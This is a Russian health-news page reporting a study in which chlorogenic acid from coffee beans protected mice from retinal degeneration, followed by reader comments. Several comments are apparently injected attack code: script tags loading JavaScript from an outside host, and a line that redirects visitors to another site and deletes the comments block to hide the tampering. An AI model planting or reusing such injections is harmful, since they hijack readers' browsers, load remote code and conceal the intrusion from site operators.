Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Какой напиток не позволит...  >>  Какой напиток не позволит вам ослепнуть?!
 
Обратная связь
 

Какой напиток не позволит вам ослепнуть?!

Размер шрифта
28 ноября 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Любители кофе, можете радоваться! По мнению ученых, чашка этого напитка может подарить вам не только заряд энергии: кофе также помогает предотвратить развитие ухудшения зрения и слепоты вследствие дегенерации сетчатки, возникающей при глаукоме, диабете и старении.

Не обжаренные кофейные зерна содержат всего 1% кофеина, однако в них также содержится от 7 до 9 процентов хлорогеновой кислоты – сильного антиоксиданта, который предотвращает дегенерацию сетчатки в экспериментах на мышах. Исследование действия этой кислоты было проведено в Университете Корнелла, а его результаты опубликованы в Journal of Agricultural and Food Chemistry.

Сетчатка – это тонкая ткань на внутренней задней стенке глаза, в которой расположены миллионы светочувствительных клеток, которые получают и систематизируют зрительную информацию. Это также ткань с очень активным обменом веществ, которой требуется высокий уровень кислорода. Именно поэтому она очень чувствительна к оксидативному стрессу: недостаток кислорода и образование свободных радикалов приводят к повреждению сетчатки и потере зрения.

В эксперименте на мышах был использован оксид азота, который вызывает оксидативный стресс и приводит к образованию свободных радикалов, что ведет к дегенерации сетчатки. Однако у тех мышей, которым предварительно давали хлорогеновую кислоту, повреждения сетчатки не наблюдалось.

«Это исследование очень важно для понимания того, какие именно натуральные продукты могут оказывать положительное влияние на наше здоровье», – рассказывает Чанг Ли, профессор диетологии и автор работы. «Кофе – один из самых популярных напитков во всем мире, и сейчас мы только начинаем осознавать, какую пользу он может приносить», – добавляет Ли. Более ранние исследования показали, что кофе также снижает риск развития таких заболеваний как болезнь Паркинсона, рак простаты, сахарный диабет и болезнь Альцгеймера.

Хлорогеновая кислота и ее производные всасываются в кишечнике, однако ученым только предстоит узнать, способствует ли употребление кофе проникновению этой кислоты через барьер между кровеносными сосудами и сетчаткой. Если окажется, что хлорогеновая кислота из кофе может быть доставлена непосредственно в сетчатку глаза, то вскоре врачи, возможно, будут рекомендовать этот напиток своим пациентам в целях предотвращения нарушений зрения, вызванных дегенерацией сетчатки. К тому же, в будущем могут быть разработаны специальные глазные капли, содержащие хлорогеновую кислоту.

Так что если вы любите начинать свое утро с чашки ароматного кофе, знайте – наука на вашей стороне.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - kastetus

29 ноября 2014 в 23:48

Цитировать   |   Пожаловаться

Какая в данном случае суточная дозировка кофеина должна быть?

2 - zzzzzz

30 июня 2015 в 18:29

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 21:28

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

4 - zzzzzz

30 июня 2015 в 22:24

Цитировать   |   Пожаловаться

-->> window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Горькая дыня морит рак голодом   Депрессия приводит к старости   Узнайте, будет ли у вас рак в течение 10 лет   Чем запивать водку, чтобы не было цирроза?  
23 июля 2013Из лысых крыс сделают лекарство от рака 01 ноября 2013ИНВИТРО – «Марка №1» в России
 
21 октября 2013ИНВИТРО открыла центр лучевой диагностики «ИНВИТРО.Эксперт» 11 октября 2013Елена Малышева расскажет все о том, как правильно худеть
 

Слайдшоу

1
Главные причины депрессии и как от них избавиться
До безумия полезные продукты. Часть 2
Что можно и чего нельзя с изжогой?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.